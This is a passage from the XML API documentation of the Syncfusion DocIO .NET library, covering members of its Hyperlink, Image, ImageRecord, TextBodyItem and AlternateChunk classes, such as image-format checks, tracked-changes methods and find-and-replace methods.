            Finds the first item of hyperlink text range.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.UpdateType">
            <summary>
            Updates the hyperlink type.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.SetUri(System.String)">
            <summary>
            Sets the URI.
            </summary>
            <param name="uri">The URI.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.SetBookmarkName(System.String)">
            <summary>
            Sets the name of the bookmark.
            </summary>
            <param name="name">The name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.SetLocalReference(System.String)">
            <summary>
            sets the local reference
            </summary>
            <param name="localReference"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.SetFilePath(System.String)">
            <summary>
            Sets the file path.
            </summary>
            <param name="filePath">The file path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.CheckValue(System.String)">
            <summary>
            Checks the value.
            </summary>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.CheckPath(System.String)">
            <summary>
            Checks the path.
            </summary>
            <param name="path">The path.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.CheckUri(System.String)">
            <summary>
            Checks the URI.
            </summary>
            <param name="uri">The URI.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyperlink.FilePath">
            <summary>
            Gets or sets the file path for file link.
            </summary>
            <value>The <b>string</b> that specifies the path of the file.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyperlink.Uri">
            <summary>
            Gets or sets URL link for web link. 
            </summary>
            <value>The <b>string</b> that specifies URL.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyperlink.BookmarkName">
            <summary>
            Gets or sets the bookmark name for Bookmark hyperlink.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyperlink.Type">
            <summary>
            Gets or sets the hyperlink type. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyperlink.TextToDisplay">
            <summary>
            Gets or sets the text which will be displayed on the place of hyperlink.
            </summary>
            <value>The <b>string </b> that specifies the text to display.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyperlink.PictureToDisplay">
            <summary>
            Gets or sets the image which will be displayed on the place of hyperlink.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> to display.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyperlink.Field">
            <summary>
            Gets the field.
            </summary>
            <value>The field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Hyperlink.LocalReference">
            <summary>
            Gets or sets the Local Reference for the hyperlink
            </summary>
            <value>The <b>string</b> that specifies the local reference.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Entities.Image">
            <summary>
            Represents the image class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.#ctor(System.IO.Stream)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Entities.Image"/> class.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.Initialize">
            <summary>
            Initializes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.CheckIfTiff">
            <summary>
            Checks if tiff.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.CheckIfBmp">
            <summary>
            Checks if image is Bitmap.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ParseBmpImage">
            <summary>
            Parses the BMP image.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.CheckIfIcon">
            <summary>
            Checks if icon.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.CheckIfPng">
            <summary>
            Checks if PNG.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.CheckIfJpeg">
            <summary>
            Checks if JPEG.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.CheckIfGif">
            <summary>
            Checks if GIF.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.CheckIfEmfOrWmf">
            <summary>
            Checks if EMF or WMF.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ParsePngImage">
            <summary>
            Parses the PNG image.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ParseJpegImage">
            <summary>
            Parses the JPEG image.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ParseGifImage">
            <summary>
            Parses the GIF image.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ParseIconImage">
            <summary>
            Parses the icon image.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ParseEmfOrWmfImage">
            <summary>
            Parses the EMF or WMF image.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ParseTifImage">
            <summary>
            Parses tif image
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ReadUInt32">
            <summary>
            Reads the Uint32.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ReadInt32">
            <summary>
            Reads the int32.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ReadUInt16">
            <summary>
            Reads the Uint16.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ReadInt16">
            <summary>
            Reads the int16.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ReadWord">
            <summary>
            Reads the word.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ReadShortLE">
            <summary>
            Reads the short LE.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.ReadString(System.Int32)">
            <summary>
            Reads the string.
            </summary>
            <param name="len">The len.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.Reset">
            <summary>
            Resets this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.FromStream(System.IO.MemoryStream)">
            <summary>
            
            </summary>
            <param name="memoryStream"></param>
            <param name="value1"></param>
            <param name="value2"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.Save(System.IO.MemoryStream,Syncfusion.DocIO.DLS.Entities.ImageFormat)">
            <summary>
            
            </summary>
            <param name="memoryStream"></param>
            <param name="imageFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entities.Image.Dispose">
            <summary>
            Performs application-defined tasks associated with freeing, releasing, or resetting unmanaged resources.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entities.Image.Width">
            <summary>
            Gets the width.
            </summary>
            <value>The width.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entities.Image.Height">
            <summary>
            Gets the height.
            </summary>
            <value>The height.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entities.Image.Format">
            <summary>
            Gets the image format.
            </summary>
            <value>The image format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entities.Image.Size">
            <summary>
            Gets the size.
            </summary>
            <value>The size.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entities.Image.ImageData">
            <summary>
            Gets the image data.
            </summary>
            <value>The image data.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entities.Image.RawFormat">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entities.Image.HorizontalResolution">
            <summary>
            Gets the Horizontal resolution
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entities.Image.IsMetafile">
            <summary>
            Gets a value indicating whether this instance is metafile.
            </summary>
            <value>
            	<c>true</c> if this instance is metafile; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Entities.ImageFormat">
            <summary>
            Specifies the image format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageRecord.#ctor(Syncfusion.DocIO.DLS.WordDocument,System.Byte[])">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ImageRecord"/> class.
            </summary>
            <param name="doc">The word document.</param>
            <param name="imageBytes">The image bytes.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageRecord.Detach">
            <summary>
            Detaches from document image collection
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageRecord.IsMetafileHeaderPresent(System.Byte[])">
            <summary>
            Compare the byte array
            </summary>
            <param name="imagebytes"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageRecord.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageRecord.UpdateImageSizeForPartialTrustMode(Syncfusion.DocIO.DLS.Entities.Image)">
            <summary>
            Updates the image size for partial trust mode.
            </summary>
            <param name="image">The image.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageRecord.UpdateImageSize(System.Drawing.Image)">
            <summary>
            Updates the size of the image.
            </summary>
            <param name="image">The image.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageRecord.GetImageInternalForPartialTrustMode(System.Byte[])">
            <summary>
            Gets the image internal for partial trust mode.
            </summary>
            <param name="imageBytes">The image bytes.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageRecord.GetImageInternal(System.Byte[])">
            <summary>
            Gets the image.
            </summary>
            <param name="imageBytes">The image bytes.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageRecord.GetImage(System.Byte[])">
            <summary>
            Gets the image.
            </summary>
            <param name="imageBytes">The image bytes.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageRecord.ImageId">
            <summary>
            Gets image byte array.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageRecord.ImageBytes">
            <summary>
            Gets image byte array.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageRecord.ImageHash">
            <summary>
            Gets hash of the image.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageRecord.OccurenceCount">
            <summary>
            Gets or sets the occurence count.
            </summary>
            <value>The occurence count.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageRecord.IsMetafile">
            <summary>
            Gets or sets a value indicating whether this instance is metafile.
            </summary>
            <value>
            	<c>true</c> if this instance is metafile; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageRecord.Size">
            <summary>
            Gets or sets the size.
            </summary>
            <value>The size.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageRecord.ImageFormatForPartialTrustMode">
            <summary>
            Gets or sets the image format for partial trust mode.
            </summary>
            <value>
            The image format for partial trust mode.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageRecord.ImageFormat">
            <summary>
            Gets or sets the image format.
            </summary>
            <value>The image format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageRecord.Length">
            <summary>
            Gets or sets the image format.
            </summary>
            <value>The image format.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextBodyItem">
            <summary>
            Represents the base implementation for paragraphs and tables.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ITextBodyItem">
            <summary>
            Represents text range functions
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ITextBodyItem.Replace(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of given regular expression with replace string.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns> 
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ITextBodyItem.Replace(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string with replace string, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <param name="caseSensitive"><b>True</b> to consider the case, otherwise <c>false</c>.</param>
            <param name="wholeWord"><b>True</b> to consider the text as whole word, otherwise <c>false</c>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ITextBodyItem.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces the regular expression with a text selection.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> which specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> class with the 
            specified <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.Find(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the text based on the specified regular expression.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <returns>The selection of text inside a paragraph along with formattings.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.Replace(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of given regular expression with the specified string.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns> 
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.Replace(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string with replace string, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <param name="caseSensitive"><b>True</b> to consider the case; otherwise, <b>false</b>.</param>
            <param name="wholeWord"><b>True</b> to consider the text as whole word; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces the specified regular expression with a <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> which specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection,System.Boolean)">
            <summary>
            Replaces the specified regular expression with a <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> along with its formatting.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> which specifies the text to replace.</param>
            <param name="saveFormatting"><b>True</b> if save with source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.FindAll(System.Text.RegularExpressions.Regex)">
            <summary>
            Returns all the entries of given regular expression.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.GetNextTextBodyItem">
            <summary>
            Gets the next TextBodyItem in the document.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.MakeChanges(System.Boolean)">
            <summary>
            Accepts or rejects changes tracked from the moment of last change acceptance.
            </summary>
            <param name="acceptChanges">if it accepts changes, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.CheckInsertRev">
            <summary>
            Checks a value indicating whether this item was inserted to the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.CheckDeleteRev">
            <summary>
            Checks a value indicating whether this item was deleted from the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <returns></returns>   
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.CheckChangedCFormat">
            <summary>
            Defines whether format was changed.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.CheckChangedPFormat">
            <summary>
            Defines whether paragraph/table format is changed. 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.AcceptCChanges">
            <summary>
            Removes the changes from character format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.AcceptPChanges">
            <summary>
            Accept changes from paragraph/table.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.RemoveCFormatChanges">
            <summary>
            Removes the character format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.RemovePFormatChanges">
            <summary>
            Removes the paragraph format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.HasTrackedChanges">
            <summary>
            Determines whether item has tracked changes.
            </summary>
            <returns>
            	If it has tracked changes, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.SetChangedCFormat(System.Boolean)">
            <summary>
            Sets the changed Character format.
            </summary>
            <param name="check">if it is check, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.SetChangedPFormat(System.Boolean)">
            <summary>
            Sets the changed Paragraph format.
            </summary>
            <param name="check">if it sets the Format, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.SetDeleteRev(System.Boolean)">
            <summary>
            Sets the delete revision.
            </summary>
            <param name="check">if it sets delete revision, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.SetInsertRev(System.Boolean)">
            <summary>
            Sets the insert revision.
            </summary>
            <param name="check">if it sets insert revision, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyItem.GetNextInSection(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Gets the next text body item.
            <exclude/>
            </summary>
            <param name="section">The <see cref="T:Syncfusion.DocIO.DLS.WSection"/> instance from which the next item to be found.</param>
            <returns>The next <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> object.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodyItem.OwnerTextBody">
            <summary>
            Gets the owner text body of the current <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> instance that is the owner of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodyItem.IsInsertRevision">
            <summary>
            Gets a value indicating whether this item was inserted to the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <value><b>True</b> if this instance was inserted; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodyItem.IsDeleteRevision">
            <summary>
            Gets a value indicating whether this item was deleted from the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <value><b>True</b> if this instance is delete revision; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodyItem.IsChangedCFormat">
            <summary>
            Defines whether format was changed.
            </summary>
            <value>The is changed format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodyItem.IsChangedPFormat">
            <summary>
            Gets a value indicating whether paragraph/table format is changed.
            </summary>
            <value>
            	If paragraph/table format is changed, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodyItem.NextTextBodyItem">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AlternateChunk.m_importOption">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.AlternateChunk"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.CloneImpl">
            <summary>
            Creates a duplicate of the entity.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.GetNextTextBodyItem">
            <summary>
            Gets Next the text body item in the document.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.GetFormatType(System.String)">
            <summary>
            Returns the bool value based on the file extension of the given file name for updating teh alternate chunk.
            </summary>
            <param name="extension"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.Update">
            <summary>
            Update the current Alternate chunk element in the Word document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.UpdateHeaderFooter(Syncfusion.DocIO.DLS.WSection,Syncfusion.DocIO.DLS.WTextBody,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Update the HeaderFooter to the main document if the parent element is  body/docPartBody/tableCell
            </summary>
            <param name="altChunkFirstSection"></param>
            <param name="ownerTextBody"></param>
            <param name="section"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.CheckDeleteRev">
            <summary>
            Checks a value indicating whether this item was deleted from the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <returns></returns>
            <value>
            	if this instance is delete revision, set to <c>true</c>.
            </value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.SetChangedPFormat(System.Boolean)">
            <summary>
            Sets the changed Paragraph format for table.
            </summary>
            <param name="check">if it specifies the format to be changed, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.SetChangedCFormat(System.Boolean)">
            <summary>
            Sets the changed C format.
            </summary>
            <param name="check">if it specifies formatting, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.SetDeleteRev(System.Boolean)">
            <summary>
            Sets the delete rev.
            </summary>
            <param name="check">if specifies delete revision, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.SetInsertRev(System.Boolean)">
            <summary>
            Sets the insert rev.
            </summary>
            <param name="check">if it specifies insert revision, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.HasTrackedChanges">
            <summary>
            Determines whether item has tracked changes.
            </summary>
            <returns>
            	if has tracked changes, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.Replace(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of given regular expression with replace string.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns> 
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.Replace(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string with replace string, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <param name="caseSensitive"><b>True</b> to consider the case, otherwise <c>false</c>.</param>
            <param name="wholeWord"><b>True</b> to consider the text as whole word, otherwise <c>false</c>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces the regular expression with a text selection.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> which specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection,System.Boolean)">
            <summary>
            Replaces all entries of given regular expression with TextRangesHolder.
            </summary>
            <param name="pattern">The pattern.</param>
            <param name="textSelection">The text selection.</param>
            <param name="saveFormatting">if it specifies save source formatting, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string with TextRangesHolder, taking into
            consideration caseSensitive and wholeWord options.
            </summary>
            <param name="given">The given.</param>
            <param name="textSelection">The text selection.</param>
            <param name="caseSensitive">if it specifies case sensitive, set to <c>true</c>.</param>
            <param name="wholeWord">if it specifies to check whole word, set to <c>true</c> .</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string with TextRangesHolder, taking into
            consideration caseSensitive and wholeWord options.
            </summary>
            <param name="given">The given.</param>
            <param name="textSelection">The text selection.</param>
            <param name="caseSensitive">if it specifies case sensitive, set to <c>true</c> .</param>
            <param name="wholeWord">if it specifies to search a whole word, set to <c>true</c> .</param>
            <param name="saveFormatting">if it specifies save source formatting, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.ReplaceFirst(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces first entry of given string with replace string, taking into
            consideration caseSensitive and wholeWord options.
            </summary>
            <param name="given">The string to replace</param>
            <param name="replace">Replace string</param>
            <param name="caseSensitive">Is case sensitive replace?</param>
            <param name="wholeWord">Search for whole word?</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.ReplaceFirst(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of given regular expression with replace string.
            </summary>
            <param name="pattern"></param>
            <param name="replace"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.RemoveCFormatChanges">
            <summary>
            Removes the character format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.RemovePFormatChanges">
            <summary>
            Removes the paragraph/table format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.AcceptCChanges">
            <summary>
            Accepts the changes for character format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.AcceptPChanges">
            <summary>
            Accepts changes in paragraph/table format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.CheckChangedCFormat">
            <summary>
            Defines whether format was changed.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.CheckInsertRev">
            <summary>
            Checks a value indicating whether this item was inserted to the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <returns></returns>
            <value>
            	if this instance was inserted, set to <c>true</c>.
            </value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.Find(System.Text.RegularExpressions.Regex)">
            <summary>
            Returns first entry of given regex.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.Find(System.String,System.Boolean,System.Boolean)">
            <summary>
            Returns first entry of given string, taking into consideration caseSensitive
            and wholeWord options.
            </summary>
            <param name="given">The given.</param>
            <param name="caseSensitive">if it is case sensitive, set to <c>true</c>.</param>
            <param name="wholeWord">if it specifies to search a whole word, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AlternateChunk.MakeChanges(System.Boolean)">
            <summary>
            Accepts or rejects changes tracked from the moment of last change acceptance.
            </summary>
            <param name="acceptChanges">if it accepts changes, set to <c>true</c>.</param>
        </member>
